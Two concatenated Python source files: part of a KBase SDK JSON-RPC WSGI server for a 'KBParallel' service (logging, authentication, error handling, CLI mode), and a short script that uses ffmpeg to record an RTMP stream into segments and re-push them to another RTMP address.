            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'KBParallel'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_KBParallel.run_batch,
name='KBParallel.run_batch',
types=[dict])
self.method_authentication['KBParallel.run_batch'] = 'required' # noqa
self.rpc_service.add(impl_KBParallel.status,
name='KBParallel.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
        except ValueError:
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'KBParallel ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
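        # The offset is derived by differencing local and UTC "now", rounding
        # to whole minutes, and appending it as an explicit +HH:MM suffix,
        # e.g. "2020-06-03T10:06:00.123456+08:00" (illustrative value only).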
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server,
# listening on port 9999 by default, execute this file directly
#
try:
import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be async
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, starts the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread stays in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess=True; this
    also makes the assigned port number available to the caller (see the
    commented usage sketch after stop_server below).'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
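# A minimal usage sketch for the two helpers above (assumption: called from a
# test or interactive session; not part of the original module):
#
#     port = start_server(newprocess=True)  # serve requests in a child process
#     # ... POST JSON-RPC requests to http://localhost:<port> ...
#     stop_server()                         # terminate the child process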
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
ffmpeg_rtmp_transfer.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2020/6/3 10:06 AM
# @File : rtmp_video_pusher.py
# @author : Bai
# @Software: PyCharm
import os
import time
from multiprocessing import Process
PULL_ADDR = 'rtmp://localhost:1935/live/1234'
PUSH_ADDR = 'rtmp://10.10.14.120:1935/stream/1234'
TMP_FILE_FOLDER = "./data/"
FILENAME = 'test%d.mp4'
PLAYLIST = 'list.txt'
SEG_TIME = '10'
# -rw_timeout has no effect on builds such as
# ffmpeg version 4.2.1 Copyright (c) 2000-2019 the FFmpeg developers
# built with Apple clang version 11.0.0 (clang-1100.0.33.8)
# On Linux it does work, e.g. with
# ffmpeg version N-93985-gff2a638-0ubuntu0.16.04.1 Copyright (c) 2000-2019 the FFmpeg developers
# built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.11) 20160609
# The value 5000000 is in microseconds (i.e. 5s), but the observed timeout is about 10s.
cut_commond = 'ffmpeg -rw_timeout 5000000' \
' -i {pull_address}' \
' -c copy' \
' -flags +global_header' \
' -f segment' \
' -segment_time {seg_time}' \
' -segment_format_options movflags=+faststart' \
' -reset_timestamps 1 {filename}'.format(
pull_address=PULL_ADDR, seg_time=SEG_TIME, filename=TMP_FILE_FOLDER + FILENAME)
push_commond = 'ffmpeg -re -f concat -i {playlist} -c copy -f flv {push_address}'.format(
playlist=TMP_FILE_FOLDER + PLAYLIST, push_address=PUSH_ADDR)
# p = os.system(cut_commond)
# print(p)
def playlist_generator(max_count):
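    # Builds a playlist in ffmpeg's concat-demuxer format: one
    # "file 'testN.mp4'" line per expected segment, so the push command can
    # replay the recorded segments in order.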
str_list = []
for i in range(0, max_count):
        entry = 'file \'' + FILENAME % i + '\'\n'
        str_list.append(entry)
with open(TMP_FILE_FOLDER + PLAYLIST, 'w') as pl:
pl.writelines(str_list)
def save_rtmp_video():
print("save:gene")
playlist_generator(500)
print("save:start")
p = os.system(cut_commond)
print(p)
def list_rtmp_push():
print("push:start")
os.system(push_commond)
if __name__ == '__main__':
save_process = Process(target=save_rtmp_video)
push_process = Process(target=list_rtmp_push)
save_process.start()
    time.sleep(45)  # must sleep longer than 30s + seg_time (10s), i.e. more than 40s, before pushing starts
push_process.start()
|